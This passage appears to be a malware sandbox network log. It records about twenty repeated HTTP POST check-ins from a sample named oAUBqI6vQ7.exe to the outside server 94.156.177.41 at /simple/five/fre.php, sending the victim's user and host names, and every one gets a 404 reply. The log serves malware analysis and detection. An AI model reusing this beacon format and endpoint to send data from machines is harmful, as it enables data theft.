Jan 10, 2025 23:39:53.364284992 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:39:53.373245955 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:39:54.086421013 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:39:53 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.9	49954	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:39:54.275588989 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:39:54.280518055 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:39:55.024964094 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:39:54 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.9	49960	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:39:55.179301023 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:39:55.188308954 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:39:55.955041885 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:39:55 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.9	49967	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:39:56.115992069 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:39:56.120922089 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:39:56.995440960 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:39:56 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.9	49975	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:39:57.143771887 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:39:57.148897886 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:39:57.897746086 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:39:57 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.9	49981	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:39:58.055207014 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:39:58.061788082 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:39:58.785621881 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:39:58 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.9	49988	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:39:58.938091993 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:39:58.942881107 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:39:59.648194075 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:39:59 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.9	49993	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:39:59.800064087 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:39:59.805268049 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:40:00.553069115 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:40:00 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.9	49998	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:40:00.707288980 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:40:00.712172031 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:40:01.422059059 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:40:01 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.9	50004	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:40:01.562855959 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:40:01.567820072 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:40:02.303385973 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:40:02 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.9	50011	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:40:02.470757961 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:40:02.475547075 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:40:03.178976059 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:40:03 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.9	50016	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:40:03.333761930 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:40:03.338597059 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:40:04.057585001 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:40:03 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.9	50017	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:40:04.215109110 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:40:04.219923019 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:40:04.934844017 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:40:04 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.9	50018	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:40:05.086379051 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:40:05.091255903 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:40:05.820097923 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:40:05 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.9	50019	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:40:05.970664978 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:40:05.975511074 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:40:06.677666903 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:40:06 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.9	50020	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:40:06.856544971 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:40:06.861435890 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:40:07.584403992 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:40:07 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.9	50021	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:40:07.737746000 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:40:07.743341923 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:40:08.487675905 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:40:08 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.9	50022	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:40:08.640381098 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:40:08.645277977 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:40:09.332636118 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:40:09 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.9	50023	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:40:09.486047983 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:40:09.491507053 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:40:10.187540054 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:40:10 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.9	50024	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:40:10.331780910 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:40:10.336713076 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:40:11.084660053 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:40:10 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.9	50025	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:40:11.239687920 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:40:11.244941950 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:40:11.967741966 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:40:11 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.9	50026	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:40:12.109256983 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:40:12.114269972 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:40:12.827827930 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:40:12 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.9	50027	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
